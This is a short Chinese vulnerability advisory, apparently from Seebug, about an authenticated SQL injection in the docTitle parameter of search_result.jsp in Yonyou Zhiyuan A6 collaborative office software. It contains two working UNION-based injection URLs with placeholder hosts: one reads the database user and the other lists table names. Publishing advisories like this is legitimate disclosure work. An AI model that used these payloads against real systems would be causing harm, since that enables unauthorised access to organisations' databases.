用友致远A6协同管理SQL注射漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友致远A6协同管理SQL注射漏洞,需登录账户。 ### 详细说明: 注入发生在search_result.jsp文件中的docTitle参数 ``` http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1'and/**/1=2/**/ union/**/all/**/select/**/user(),2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc ``` [<img src="https://images.seebug.org/upload/201306/0300425251c1ded70b2db7e1f54dd4a4a4b4aa76.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/0300425251c1ded70b2db7e1f54dd4a4a4b4aa76.png) 查询表名: ``` http:// xxxxxx.com /yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/group_concat(table_name),2,3,4,5/**/from/**/information_schema.tables%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc ``` [<img src="https://images.seebug.org/upload/201306/030044321a8f5a91599c56220dfcfd66cb41176b.png" alt="4.png" width="600"...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息